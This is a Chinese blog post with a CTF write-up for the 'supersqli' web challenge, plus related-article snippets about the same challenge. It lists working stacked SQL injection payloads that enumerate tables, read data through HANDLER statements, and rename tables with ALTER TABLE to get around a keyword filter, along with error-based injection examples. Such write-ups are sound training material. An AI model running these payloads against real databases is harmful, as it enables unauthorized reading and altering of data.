web_进阶_Web_supersqli

最新推荐文章于 2023-03-27 12:40:14 发布
最新推荐文章于 2023-03-27 12:40:14 发布
阅读量200 收藏
点赞数
分类专栏: ctf-web刷题之旅
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JURUO222/article/details/107858467
版权

由于select被过滤,堆叠注入

inject=-1%27;show%20tables%20–+

inject=-1’;show columns from 1919810931114514 --+

方法一
使用handler查询,payload如下:
-1’;handler 1919810931114514 open;handler 1919810931114514 read first;#

方法二
1’; alter table words rename to words1;alter table 1919810931114514 rename to words;alter table words change flag id varchar(50);#
拆分开来如下:
1’;
alter table words rename to words1;
alter table 1919810931114514 rename to words;
alter table words change flag id varchar(50);
4.然后使用1’ or 1=1#即可查询出flag

Diana_1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SuperSQLEXEC
04-02
SuperSQLEXEC
supersqli
怪味巧克力的博客
05-27 4524
0x01 拿到题目后,发现是单引号报错字符型注入 order by 2的时候页面正常回显,order by 3的时候页面出错,所以我们知道只有两个字段。 接下来union联合查询,发现select被过滤了 所以我们需要绕过select的过滤,下面有几种方法 0x02 堆叠查询+预编译 我们发现这里可以执行多sql语句,所以我们可以采用堆叠查询,那我们查询表名,结果如下: 查询表名中的列名,结果如下: 所以我们找到flag在第一个表中,那么接下来我们要查看flag中的内容,但是这里select被过滤了
攻防世界-Web-supersqli
uh_eng的博客
08-14 328
本题涉及到了堆叠注入、MySQL预编译 0x01 SQL注入的题目,按照流程来验证SQL注入漏洞。 首先输入1' and '1'='1发现正常输出,然后输入1' and '1'='2发现没有输出,进一步尝试联合注入,输入1' union select 1 #结果返回了 return preg_match("/select|update|delete|drop|insert|where|./i",$inject); 可见后端过滤掉了一些SQL关键字,显然不能直接通过这些关键字进行注入。 0x02 尝试使用
[攻防世界]supersqli
weixin_55466841的博客
04-30 228
输个单引号看看, 可以判断出来是字符型注入。 1' and 1=1# #有回显 1' and 1=2# #无回显 判断列数 1' order by 1# 1' order by 2# ... 2列。 用联合注入发现过滤了好多关键字 接下来用堆叠注入。 1'; show databases;# 1'; show tables;# ';show columns from `1919810931114514`;# ';show colu...
Domino_Web_Access_配置
03-04
Domino_Web_Access_配置
webrtc_web_master_demo
09-25
webrtc_web_master实例代码,可根据实际情况分析,学习。
0100_java_web_class2.rar_JAVA WEB基础
09-14
这个压缩包文件"0100_java_web_class2.rar_JAVA WEB基础"显然是一个教学资源,旨在通过实例来教授初学者关于Java Web的基础知识。下面我们将深入探讨这个主题。 Java Web开发通常包括Servlet、JSP(Java Server ...
chat_room_web_programming_development_design_class_chat web_web
09-20
web编程开发设计聊天室经典代码chat room web programming development design classic code
Go Web开发进阶实战(gin框架)
01-05
Go Web开发进阶实战(gin框架)课程,适用于Go语言初学者、掌握Go语言基础语法想学习进阶内容。 由在职程序员打造的Go语言实战课程体系,与你分享企业项目开发经验与技巧。真正做到课程有内容、有深度,并且老师讲...
SuperSQL注入.rar
07-21
一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 1.支持任意地点出现的任意SQL注入 2.支持各种语言环境。大多数注入工具在盲注下,无法获取中文等多字节编码字符内容,本工具可完美解决。 3.支持注入数据发包记录。让你了解程序是如何注入,有助于快速学习和找出注入问题。 4.依靠关键字进行盲注,可通过HTTP相应状态码判断,还可以通过关键字取反功能,反过来取关键字。
攻防世界XCTF:supersqli
末初的CSDN博客
03-13 2362
加个单引号发现报错 比较烦的就是过滤了select 这样就无法进行查数据了,而且这里的/i就是忽略了大小写。无法进行大小写过滤 首先可以通过报错函数,把数据库给注入出来 -1' and extractvalue(1,concat(1,version()))-- + 版本信息:.18-MariaDB 数据库名称:supersqli 然后经过测试发现这里可以执行多条语句,也就是堆叠注入...
攻防世界——supersqli
weixin_62281892的博客
09-18 1792
PHP preg_replace() 正则替换,与Javascript 正则替换不同,PHP preg_replace() 默认就是替换所有符号匹配条件的元素。到这里我们的表列名就已经修改完毕,此时还会输出修改完成的words列名,最后通过万能钥匙1' or '1'='1即可得到输出。由于注入框的查询是对列id的搜索,此时参考两个表的列名,需要将flag列名改为能够查找的id列(修改包括名称和数据类型)。上网冲浪了解了一波,好像是类似黑名单,这些词会被替换,那没办法了,我们就用堆叠注入。
攻防世界-supersqli
weixin_43960066的博客
03-27 393
由于没有对alter,rename做出过滤,将1919810931114514修改为words,将flag修改为id,同时将words修改为其他的,将id也修改为其他的。由于过滤了一些关键字,所以想要得到flag可采取预编译、修改flag的名字为id修改1919810931114514为words(即可在搜索框中直接输入即可)发现flag在数字表中,同时判断当前正在使用的就是supersqli这个数据库,输入框中输入1就是查询的word表。想要得到flag需要使用的语句为。使用堆叠注入,查看数据库。
【攻防世界】——WEB高手进阶--supersqli
weixin_43828818的博客
05-23 546
题目进去就是一个常见的注入,提交个1正常返回数据,提交’返回错误,存在注入。 order by 2–+时候正常返回,order by 3–+报错,发现有2个字段。接着正常程序走,准备联合查询字段,果然,不可能给的那么简单,果然报错,正则过滤了一些常用的查询关键字。 尝试了多种普通绕过,大小写、重写都绕过不了,后来想到了堆叠注入;果然可以 1‘;show talbes–+ 查看两个表的字段名,在·1919810931114514·中发现我们想要的flag,查看words看一下结构。 1’;show c
【攻防世界】五 --- supersqli
qq_43168364的博客
12-23 409
题目 — supersqli 一、writeup 二、知识点
攻防世界之supersqli
qq_44111753的博客
11-16 321
攻防世界 supersqli 题目 WP: 输入1、2、3提交 发现输入的数值提交到inject 发现inject存在sql注入风险 尝试堆叠注入 发现数据库 查看supersqli中的表 发现两个表 尝试查询表内的所有内容 发现对select|update|delete|drop|insert|where进行了过滤 继续查看字段 发现1919810931114514表中的flag,但无法使用select语句,不能直接输入,但发现words表中的id属性和输入的参数inject很相似,都为整型
web_audio_sdp
最新发布
02-02
web_audio_sdp是指Web音频会话描述协议(Web Audio Session Description Protocol)。它是一种用于在Web应用程序中描述音频会话的协议。通过web_audio_sdp,Web应用程序可以向远程服务器发送音频流的描述信息,以便建立音频通信并进行音频流的传输。 web_audio_sdp具有灵活、高效的特点,可以支持多种音频格式和编解码器。它使用SDP(Session Description Protocol)格式来描述音频会话的各种参数,包括音频流的编码格式、传输协议、网络地址等。这些描述信息可以传输到远程服务器,并被用于建立音频通信和进行音频流的传输。 通过web_audio_sdp,Web应用程序可以实现音频通话、音频会议等功能,实现声音的实时传输和通信。它为Web应用程序提供了一个统一的音频会话描述协议,使得不同平台和设备之间的音频通信变得更加方便和高效。 总之,web_audio_sdp是一个用于描述Web音频会话的协议,它可以帮助Web应用程序实现音频通信和流传输,为用户提供更好的声音体验。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值